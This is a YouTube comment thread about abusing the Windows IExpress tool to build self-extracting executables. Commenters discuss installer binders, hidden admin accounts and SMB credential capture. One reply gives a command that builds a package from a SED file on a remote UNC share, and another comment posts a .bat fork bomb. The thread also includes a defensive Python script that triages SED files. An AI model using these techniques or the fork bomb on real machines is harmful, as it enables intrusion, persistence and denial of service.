Self-Extracting Executables for Hackers

  • Published: 29 Oct 2024

Comments • 159

  • @trens1005
    @trens1005 1 month ago +9

    I used to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out about WPF applications on web pages to bypass security. Not as easy as it used to be with IE, but still there. Also use an MSI file with resilience to re-download when the file is removed. Old as time, but works even today.

  • @Grifter
    @Grifter 2 months ago +20

    Reminds me of doing naughty things with winrar back in the day. You could create a winrar executable that would function like a normal zip file but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.

  • @neutrino2211_
    @neutrino2211_ 2 months ago +18

    With this I think I'm not just "living off the land", your computer is my Dukedom

  • @TheWeakLink101
    @TheWeakLink101 2 months ago +11

    "open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching YouTube tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!

  • @CU.SpaceCowboy
    @CU.SpaceCowboy 2 months ago +48

    literally never heard of it, great video.

    • @nyandesu9165
      @nyandesu9165 2 months ago +5

      wow, you must have had a sad childhood if you never went to play in system32

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 1 month ago +2

      @nyandesu9165 lol not really, no, I had an iMac as a kid, not a Windows. I've just never read about this particular binary. I'll usually look at windir for DLL sideloading and stuff by checking missing DLLs in procmon or wtv. Haven't explored a lot of lolbins. :D

  • @flok.7735
    @flok.7735 1 month ago +1

    Finally the 40+ min. videos are back. I missed them. I would love more stuff like the 'Throwback Network' videos. And no offence, but the 10-15 min. videos with 3 min. advertisements in the middle got kind of boring over time. Love ya, take care.❤

  • @jamesion2733
    @jamesion2733 1 month ago +8

    How do people even find this stuff! As an addicted learner of this genre of IT, this is gold!

  • @hacking4good
    @hacking4good 2 months ago +2

    I ❤ living in QUANTUM time, thanks to Microsoft (and John & the researchers)

  • @adnan6041
    @adnan6041 1 month ago

    This is golden info😊

  • @a2bros186
    @a2bros186 2 months ago +6

    This is some very good information, mister

  • @ebbrayezkhanzada7304
    @ebbrayezkhanzada7304 1 month ago

    You have my attention for the rest of my life

  • @BkSMedia
    @BkSMedia 2 months ago +8

    This is mental, I will never trust an exe ever again 🤣 Thank goodness I use Linux as a daily OS

    • @Critical3rror
      @Critical3rror 1 month ago

      Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy nilly is bad no matter the OS. The strongest anti virus is a smart user, but even they aren't infallible.

    • @EpicNoobx
      @EpicNoobx 1 month ago +2

      Linux isn't immune to viruses. Also, you don't need to mention that you use Linux everywhere.

  • @qw5pcnvkzghhrybb231
    @qw5pcnvkzghhrybb231 1 month ago +2

    What an outro 😂 with the loop of calc

  • @BLiNKx86
    @BLiNKx86 2 months ago +2

    Love the early morning uploads! At least in California

  • @jonnyfatboy7563
    @jonnyfatboy7563 1 month ago

    it seems like a great tool to keep in the windows install... if you are the NSA 😲

  • @autohmae
    @autohmae 2 months ago +2

    After I saw you can automate it, without any windows: definitely should be on the list!

  • @heatherryan9820
    @heatherryan9820 1 month ago +2

    Would antivirus catch the iexpress instance though? Like when you first call iexpress, would antivirus throw a warning?

    • @0x4e696b
      @0x4e696b 1 month ago +2

      Probably not, as it's built into Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.

  • @mbashiry
    @mbashiry 2 months ago

    very good information

  • @siomek101
    @siomek101 2 months ago

    You can put the command in the GUI too, it's not stopping you (13:05)

  • @DjPsYcOtIc
    @DjPsYcOtIc 1 month ago

    Cheers.

  • @BLKMGK4
    @BLKMGK4 1 month ago

    Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :)
    BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!

  • @HauthyPiyces
    @HauthyPiyces 2 months ago +1

    hm, that might be a problem

  • @modzgodzo
    @modzgodzo 1 month ago

    wtf John, stop please, you're makin' me really anxious about everything connected to the internet. :D

  • @markusTegelane
    @markusTegelane 2 months ago +1

    0:13 that's what they want you to think

  • @sreejith_jinachandran
    @sreejith_jinachandran 1 month ago

    From the 3 below, which one is efficient
    AWUS036ACM
    AWUS036ACH
    AWUS036NHA
    according to you?

  • @Sristi-Misti
    @Sristi-Misti 2 months ago

    Sir, Would you make videos about scammers please 🙏

    • @Sristi-Misti
      @Sristi-Misti 1 month ago

      @romanemul1 Did I ask you? Or are you a scammer?

  • @88tx
    @88tx 2 months ago +52

    for "hackers", specifically the skids lmao

    • @inspirationchannel101
      @inspirationchannel101 2 months ago +1

      Well said 😂

    • @SecGuy-v9p
      @SecGuy-v9p 2 months ago +4

      Well, lolbins are not really only used by skiddies; several bigger threats have been using lolbins like certutil or installutil.

    • @inspirationchannel101
      @inspirationchannel101 2 months ago +13

      @88tx Well, I guess any good pen tester would use anything at their disposal, even if it's easy. No reason to work twice the amount for the same outcome 🙂

    • @isheamongus811
      @isheamongus811 2 months ago

      I have seen something like that with .bat

    • @Alfred-Neuman
      @Alfred-Neuman 2 months ago

      Why would it be used specifically by script kids?
      People like you seem to think real hackers only use their own zero-days written in assembly and connect to the internet using hacked Norwegian satellites, etc... lol

  • @lfcbpro
    @lfcbpro 1 month ago

    When you were running the .exe files, I assumed you were in the Admin role. I am curious what would display on the UAC for a non-Admin role?
    Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people?
    Also, I was not sure where the connection to Internet Explorer came from in the Sigcheck details?

  • @HeinrichChristiansen
    @HeinrichChristiansen 1 month ago

    Rebuilding Installer.exe from Installer.SED - Can the other way around be done too?
    Just curious

  • @WylieBayes-q9m
    @WylieBayes-q9m 2 months ago +1

    Damn it John. Stop burning my unknown lolbins!

  • @TangoBravo-z4p
    @TangoBravo-z4p 2 months ago +1

    100 percent of kids would do this on every PC in schools back in my day looooool, if only we had YouTube haha

  • @BangBangBang.
    @BangBangBang. 1 month ago

    You can right click on an exe and choose extract.

  • @CZghost
    @CZghost 2 months ago

    Definitely. After watching the video, certainly! :D

  • @darkshoxx
    @darkshoxx 2 months ago +4

    28:05 Tags, also known as "greater than less than symbol waka waka alligator faces" 🐊🐊

  • @darkshoxx
    @darkshoxx 2 months ago +9

    Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)

    • @darkshoxx
      @darkshoxx 2 months ago +2

      Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?

    • @88tx
      @88tx 2 months ago

      This thing basically just zips your files and ships them as an exe. Literally any antivirus would detect it and see right through it, and only skids would use it.

    • @_JohnHammond
      @_JohnHammond 2 months ago +14

      Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either set up other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on. And you are right that it can be extra obfuscation for deeper layers of malware just as well; it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not its generated EXE... and there is nothing stopping you from providing the file with a remote location by a SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share\remote.SED), so it doesn't need to be on disk or depend on another file artifact.
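
    The reply above describes the SED file as the thing that drives IExpress: it names the files to bundle and the commands the built package runs, and `iexpress.exe /n /q <file>.SED` builds it with no GUI. During response work the SED (or the .SED that `iexpress` was pointed at over UNC) is therefore the artifact worth reading first. The script below is an added example for this thread, not John Hammond's or Microsoft's code: it parses a SED, expands the `%Name%` placeholders from `[Strings]`, and reports the target EXE, every command the package would execute (`AppLaunched`, `PostInstallCmd`, and the quiet-install commands), the bundled source files, and a few triage flags (UNC paths, shells and script hosts as the launched program). The section and key layout follows what the IExpress wizard writes; confirm it against a wizard-generated .SED on your own machine. The sample SED, its paths and commands, and the flagging heuristics are constructed for illustration.

```python
"""Triage an IExpress .SED file: report what the package it builds would run.

Added example for this thread, not John Hammond's or Microsoft's code. The
section/key layout ([Version], [Options], [Strings], [SourceFiles],
[SourceFilesN], %Name% placeholders) follows what the IExpress wizard writes;
verify against a .SED generated on your own machine. Paths, commands and the
flagging heuristics below are constructed for illustration.
"""
import configparser
import json
import re

# Constructed sample: a package that bundles payload.bat and launches it.
SAMPLE_SED = r"""[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Users\user\Desktop\Installer.exe
FriendlyName=Installer
AppLaunched=cmd.exe /c payload.bat
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="payload.bat"
[SourceFiles]
SourceFiles0=C:\Users\user\Desktop\
[SourceFiles0]
%FILE0%=
"""

# [Options] keys whose values IExpress executes: the normal launch, the
# post-install command, and the /q quiet-install variants for admin and user.
RUN_KEYS = ("AppLaunched", "PostInstallCmd", "AdminQuietInstCmd", "UserQuietInstCmd")
PLACEHOLDER = re.compile(r"%([A-Za-z0-9_]+)%")
# Interpreters worth a second look when they are the launched program (heuristic).
INTERPRETERS = {"cmd", "powershell", "pwsh", "mshta", "rundll32", "regsvr32",
                "wscript", "cscript", "certutil", "msiexec"}


def load_sed(text: str) -> configparser.ConfigParser:
    """Parse SED text; interpolation is off because values use %Name%, not %(name)s."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case (AppLaunched, FILE0, ...)
    cp.read_string(text)
    return cp


def resolve(cp: configparser.ConfigParser, value: str) -> str:
    """Expand %Name% placeholders from [Strings]; unknown names stay as written."""
    strings = cp["Strings"] if cp.has_section("Strings") else {}
    return PLACEHOLDER.sub(lambda m: strings.get(m.group(1), m.group(0)), value)


def flag(label: str, value: str) -> list:
    """Heuristic triage notes for one resolved command or source directory."""
    notes = []
    low = value.lower()
    if low.startswith("\\\\"):
        notes.append(f"{label}: UNC/network path -> {value}")
    tokens = low.split()
    program = tokens[0].rsplit("\\", 1)[-1] if tokens else ""
    if program.endswith(".exe"):
        program = program[:-4]
    if program in INTERPRETERS:
        notes.append(f"{label}: launches interpreter {program} -> {value}")
    return notes


def triage(text: str) -> dict:
    """Return the target path, commands the package would run, bundled files, flags."""
    cp = load_sed(text)
    opts = cp["Options"] if cp.has_section("Options") else {}
    result = {
        "is_iexpress": cp.get("Version", "Class", fallback="").upper() == "IEXPRESS",
        "target": resolve(cp, opts.get("TargetName", "")),
        "commands": {},
        "files": [],
        "flags": [],
    }
    for key in RUN_KEYS:
        cmd = resolve(cp, opts.get(key, "")).strip()
        if cmd and cmd != "<None>":  # <None> is the wizard's "no command" marker
            result["commands"][key] = cmd
            result["flags"] += flag(key, cmd)
    # [SourceFiles] maps SourceFilesN -> directory; each [SourceFilesN] lists its files.
    dir_section = opts.get("SourceFiles", "SourceFiles")
    if cp.has_section(dir_section):
        for dir_key, directory in cp[dir_section].items():
            result["flags"] += flag(dir_key, directory)
            names = cp[dir_key] if cp.has_section(dir_key) else ()
            for name in names:
                result["files"].append(directory + resolve(cp, name).strip('"'))
    return result


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_SED), indent=2))
```

    Point `triage()` at the text of a recovered .SED (or at the file a `iexpress.exe /n /q` command line referenced) and you get the commands without having to rebuild and run the package. Two caveats: the flags are heuristics, so an `AppLaunched` that names a renamed or LOLBin-wrapped program will not trip the interpreter check, and a SED fetched over UNC at build time may no longer exist on the share by the time you look, so the process command line itself is the artifact to preserve.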

    • @darkshoxx
      @darkshoxx 2 months ago +2

      @@_JohnHammond Just tried it from the same folder, yeah that works. Thanks for the explanation, yeah that all makes sense. Fascinating

  • @leahcimnaerc9543
    @leahcimnaerc9543 1 month ago

    iexpress as a trojan is like the old comics. where the CIA use old soviet gear to perform surveillance. The old soviet gear being giant satellite dishes with giant head phones and antenna.

  • @vladimirmisata
    @vladimirmisata 1 month ago

    Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!

    • @Cyba_IT
      @Cyba_IT 1 month ago

      Go easy on the shift key bud. 😂

  • @AnonymousPhucker
    @AnonymousPhucker 1 month ago

    Maybe run net user add commands in the secondary options? Hefty way to have sneaked-in local admin accounts?

  • @STANSLASGANDA
    @STANSLASGANDA 1 month ago +1

    I wonder how to block that as part of Windows PC hardening🤔🤔🤔???

  • @GNUGradyn
    @GNUGradyn 2 months ago

    Honestly this only feels useful for a script kiddy kind of thing, because all of this is already trivial for actual developers, e.g. via Costura

  • @AltaBross
    @AltaBross 2 months ago +10

    Can it bypass AV by first putting an exclusion on the C:\ drive, then executing PowerShell base64 in-memory ransomware?

    • @yukiqt
      @yukiqt 2 months ago +2

      no

    • @User-kq3od
      @User-kq3od 2 months ago +4

      Give up kid

    • @CyphrSec
      @CyphrSec 2 months ago +4

      This made me laugh out loud, Ty kid

    • @cybergodca
      @cybergodca 2 months ago

      it doesn't really work like that 😅

    • @galsherp6173
      @galsherp6173 2 months ago +1

      This fixes a problem which is not there, you understand? There are 1000s of ways of bundling your software, but like some other comments said: the AVs can see right through it (which is logical because it's not obfuscated...

  • @Atmatan
    @Atmatan 2 months ago

    Yo mate, one of my machines just got hacked.
    Other than Twitter, how can I send you the logs and artifacts?
    It might be worth looking into, since you're into that stuff.

    • @Atmatan
      @Atmatan 2 months ago

      Nevermind. This video has what your site doesn't: the full list of links 😂

  • @ai-spacedestructor
    @ai-spacedestructor 1 month ago

    Hang on, you started a bomb on your actual computer instead of a virtual machine?
    You're living on the edge here!

  • @Gizmologist_
    @Gizmologist_ 1 month ago

    The duke of windows nuking

  • @darshanakhare6676
    @darshanakhare6676 2 months ago +2

    I would like to see this with Metasploit in action, but YouTube will not allow it, right?

    • @yukiqt
      @yukiqt 2 months ago

      youtube would allow it, it just wouldn't be very interesting

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 2 months ago +2

      I mean you can use whatever you want for CnC lol, I'd rather use something that won't get flagged in memory or wtv, like a dotnet agent, then use a beacon or Meterpreter for advanced control after I have persistence

  • @seancrouch
    @seancrouch 1 month ago

    Hey, can someone give me an idea of what I should price my mobile app at? Main purpose/function is to be able to hash files and verify files on mobile. Already made it and it works well, just don't know what to price it at, was thinking £2? Don't want to open source it, got bills to pay. Any advice or ideas are welcome

    • @robotron1236
      @robotron1236 1 month ago

      @seancrouch Why can't I do that on my PC? My phone is basically for calling and texting people and sometimes watching YouTube/surfing the web. If I were going to use my phone like a computer, I'd just install a Linux distro on it and have everything I could ever want for free.

  • @leahcimnaerc9543
    @leahcimnaerc9543 1 month ago

    Using this "SED" technique. lol

  • @Jesseoreilly-ed7ft
    @Jesseoreilly-ed7ft 1 month ago

    Not really living off the land when I have to then social engineer someone to install the file, or run it from within a service I've already exploited. Better ways to get this done; nice way to make an installer though, I guess...

  • @bolter99
    @bolter99 12 days ago

    Windows defender instantly detected my test file lol

  • @ninjasiren
    @ninjasiren 1 month ago

    Gosh, this is like those WinRAR or WinZip self-extracting zip or rar files, where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software or this).
    Or that stuff like NSIS or InstallShield I also used a bit

  • @1.1-z9d
    @1.1-z9d 2 months ago +3

    Sup

  • @logiciananimal
    @logiciananimal 2 months ago

    The wikipedia page on this is interesting. But I am trying to figure out - why does it exist? But yes, it belongs in the lolbin category.

  • @DaRaccoonCrypto
    @DaRaccoonCrypto 1 month ago

    IExpress is something the RAT kiddies used to love using to pack up the nasty RATs. Not seen this in a while, surprised it's not in the LOTL files.

  • @k4m1kazep1lot4
    @k4m1kazep1lot4 2 months ago +2

    I wonder if you can prompt a user to run with admin privilege

    • @yukiqt
      @yukiqt 2 months ago +1

      you can, just like you can with any exe

    • @k4m1kazep1lot4
      @k4m1kazep1lot4 2 months ago +1

      @yukiqt yeah, but the installer doesn't specifically ask for admin privilege

    • @yukiqt
      @yukiqt 2 months ago

      @k4m1kazep1lot4 if you're asking if it can bypass UAC, it can't

  • @RandomytchannelGD
    @RandomytchannelGD 2 months ago

    Hi

  • @cybersecurity-yo9ec
    @cybersecurity-yo9ec 1 month ago

    Bypass antivirus with iexplorer, encode payload in Opera, for example

  • @antonioveloy9107
    @antonioveloy9107 2 months ago

    oh jeez, ofc that's a lolbin

  • @juliussakalys4684
    @juliussakalys4684 2 months ago

    yikes

  • @not_user11
    @not_user11 2 months ago

    I can't try it out because my pc doesn't run windows

    • @_Yassir_
      @_Yassir_ 2 months ago

      poor little linux user

    • @robotron1236
      @robotron1236 2 months ago

      Runs in WINE on Linux.

    • @robotron1236
      @robotron1236 1 month ago

      @@_Yassir_ in the words of OTW, “if you don’t know Linux, you’re not a hacker.”

    • @robotron1236
      @robotron1236 1 month ago

      @@not_user11 I use windows stuff like this all the time. Pretty much anything old, or CLI will run with WINE. Hell, I’d say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.

  • @HyBlock
    @HyBlock 2 months ago +136

    41 minutes of yapping just to tell us that an installer can run whatever you tell it to.

    • @MygenteTV
      @MygenteTV 2 months ago +49

      You may be right about that, but remember, you aren't entitled to anything and he doesn't owe us anything.

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 2 months ago +21

      don't be a dick bud

    • @CU.SpaceCowboy
      @CU.SpaceCowboy 2 months ago +17

      he literally jumped right in and explained what the tool was

    • @skillato9000
      @skillato9000 2 months ago +5

      @MygenteTV 🤓

    • @rohit.vikram
      @rohit.vikram 2 months ago +17

      @HyBlock spoken like someone who doesn't understand how lolbin attacks work

  • @looweegee252
    @looweegee252 2 months ago +1

    Bro who you yelling at tho

    • @Cyba_IT
      @Cyba_IT 1 month ago

      He's just passionate about the subject. He doesn't yell half as much as some youtubers do.

    • @looweegee252
      @looweegee252 1 month ago

      @@Cyba_IT I'm just trying to stay chill and learn about IT not have lunch with Samuel L Jackson 😆😆😆

    • @Cyba_IT
      @Cyba_IT 1 month ago

      @@looweegee252 😂😂😂

  • @Grumpy-Fallboy
    @Grumpy-Fallboy 2 months ago +3

    Don't worry, soon Microsoft will get rid of all the old ~[control-panel] and other vintage [features] and stuff in Windows, so you don't mess around :D

    • @seen-bc9eq
      @seen-bc9eq 2 months ago +1

      Update: they are not getting rid of it

    • @robotron1236
      @robotron1236 2 months ago

      Yup just like those .pif files too.

  • @TangoBravo-z4p
    @TangoBravo-z4p 2 months ago

    bro

  • @bob-p7x6j
    @bob-p7x6j 2 months ago

    basically first

  • @comosaycomosah
    @comosaycomosah 2 months ago

    lol classic

  • @OVERKILL_PINBALL
    @OVERKILL_PINBALL 2 months ago

    omg

  • @oxygen02
    @oxygen02 2 months ago

    first

  • @PeterSimon-pk9tb
    @PeterSimon-pk9tb 2 months ago

    Bb

  • @darkshoxx
    @darkshoxx 2 months ago

    tfw no secret end-of-video keyword 😞

  • @sweet09876
    @sweet09876 2 months ago

    second

  • @gojo99998
    @gojo99998 2 months ago

    First 🥇

  • @VaracolacidVesci
    @VaracolacidVesci 2 months ago +6

    This is kind of stupid.
    Any installer maker can do this, and there are many easier to use and abuse. It is not in the list because AN INSTALLER MAKER is known to be able to do this; it is not a design flaw or weakness.

    • @anik2443
      @anik2443 2 months ago +2

      This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.

    • @VaracolacidVesci
      @VaracolacidVesci 2 months ago

      @anik2443 It does not matter that it comes with Windows. Why would it?
      It's not like YOU are making your own malware to infect yourself.
      Any bad actor can use whatever, it doesn't have to be pre-installed. That is why it is stupid

    • @anik2443
      @anik2443 2 months ago +1

      @VaracolacidVesci Do you know nothing about post exploitation? It's for remaining undetected by using tools available natively in the system. Go research it

    • @VaracolacidVesci
      @VaracolacidVesci 2 months ago

      @anik2443 hahahaha ofc not! You are trying to sound fancy, but clearly you are just another asshole on the internet.
      It's not like the AV engines or any other software would say OH, it is made by the system tool, let's allow it!
      hahaha how stupid can you be

    • @VaracolacidVesci
      @VaracolacidVesci 2 months ago

      @anik2443 hahahaha OFC NOT!
      There is nothing special about it being on the system, it's not like the exe would have anything special about it. It's not like the AV engines or any other protection would say, OH it is made by the system tool, let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?

  • @RyanGForcE-xo9zx
    @RyanGForcE-xo9zx 2 months ago +1

    Bring game hacking *🎉❤

  • @Alaz21
    @Alaz21 2 months ago

    First 😂

  • @mineyoucraftube1768
    @mineyoucraftube1768 2 months ago

    i remember pranking my friends with a .bat file (named hello.bat) containing:
    start hello.bat
    call hello.bat
    very funny, unless you have unsaved work
    (unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)

  • @mikeonthecomputer
    @mikeonthecomputer 1 month ago

    Instructions unclear. Typing does nothing on my Windows 95 computer's start menu.